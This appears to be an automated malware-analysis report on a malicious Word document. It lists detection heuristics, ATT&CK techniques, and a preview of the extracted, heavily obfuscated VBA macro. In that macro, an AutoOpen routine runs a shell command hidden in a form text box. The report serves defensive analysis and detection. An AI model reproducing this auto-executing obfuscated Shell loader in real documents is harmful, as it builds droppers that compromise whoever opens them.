MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and the 'Shell()' function is called, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further stages of malware. The specific functionality of the VBA script is heavily obfuscated, preventing a more detailed analysis of its exact actions.
Heuristics 7
-
ClamAV: Doc.Malware.Generic-6791609-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6791609-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5971 bytes |
SHA-256: e2251e5f96180f8f6a752173d0db1b6e164d073a2e6bd4cb928ed37d7fb6beb0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "L69789720701213"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
l848 = "M6740"
v6329 = "K6660"
T256 = "Y9744"
s1045119
i8734 = "c788"
J3341 = "E378"
U0717 = "L6466"
End Sub
Attribute VB_Name = "d535950937703"
Function s1045119()
On Error Resume Next
Select Case U749
Case 543
L593 = r087
D7791 = Log(o7733)
P1171 = p277
Case 369
d486 = p271
t088 = CBool(r983)
z429 = Rnd(p880 / Hex(Q432 * k822 - H7932 / Int(174)) * 835 - 294)
End Select
w3952 = 454 - 183
Set w571 = n686
Select Case I016
Case 342
N4158 = B1729
i637 = Log(q341)
K1146 = n7367
Case 565
v200 = S8828
J816 = CBool(N4054)
D541 = Rnd(N003 / Hex(F245 * s313 - A373 / Int(788)) * 694 - 235)
End Select
z382 = 54 - 717
Set X701 = q3691
Select Case J2965
Case 862
a5778 = c021
i3882 = Log(R6004)
p501 = u627
Case 816
A5688 = P6533
P951 = CBool(L097)
N928 = Rnd(P260 / Hex(r5836 * i875 - w6472 / Int(769)) * 858 - 588)
End Select
j0292 = 707 - 553
Set a0504 = L923
Select Case E3704
Case 847
F112 = r9501
K124 = Log(k5455)
k169 = v4586
Case 19
H756 = h1961
U158 = CBool(z5150)
P1693 = Rnd(F5362 / Hex(A7327 * R6870 - m129 / Int(471)) * 273 - 468)
End Select
G3450 = 16 - 374
Set n196 = H513
h323333912 = Array(M0030391, i637107329, d58358, Interaction.Shell(("" + v5804520 + Q73263 + Z34707 + L69789720701213.TextBox1) + H92859 + z93782 + J597939 + V37335, 58 - 58), k36488, H400255, N44599)
Select Case Y2304
Case 225
q608 = W471
L9546 = Log(s6158)
v346 = w043
Case 752
U7614 = f3321
i079 = CBool(R4483)
h7584 = Rnd(j865 / Hex(D716 * n5269 - p8651 / Int(450)) * 975 - 881)
End Select
F290 = 378 - 894
Set P065 = w6909
Select Case z4962
Case 930
L245 = f834
t520 = Log(W3465)
p962 = S102
Case 749
P4799 = H187
t2717 = CBool(w636)
v548 = Rnd(u384 / Hex(T129 * i613 - i9105 / Int(544)) * 392 - 731)
End Select
z6639 = 430 - 186
Set D1381 = c515
Select Case M0838
Case 474
D653 = m655
Z008 = Log(p777)
a9685 = l0483
Case 717
m565 = j615
N528 = CBool(p227)
k921 = Rnd(r5171 / Hex(F8534 * T5117 - X343 / Int(788)) * 693 - 113)
End Select
f778 = 857 - 245
Set o4264 = k277
Select Case q6033
Case 556
z1741 = i638
C419 = Log(L6766)
I0432 = c7098
Case 933
f752 = P5559
p7098 = CBool(b0429)
w8390 = Rnd(n6359 / Hex(z842 * H471 - Z5979 / Int(196)) * 281 - 789)
End Select
z8054 = 239 - 455
Set n846 = o890
End Function
Attribute VB_Name = "n76019893674602"
Attribute VB_Name = "n41472953"
Attribute VB_Name = "E8630250278168"
Attribute VB_Name = "X3956860277257"
Attribute VB_Name = "G086054562451"
Attribute VB_Name = "i24535324272"
Attribute VB_Name = "Y52096008"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Custom
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.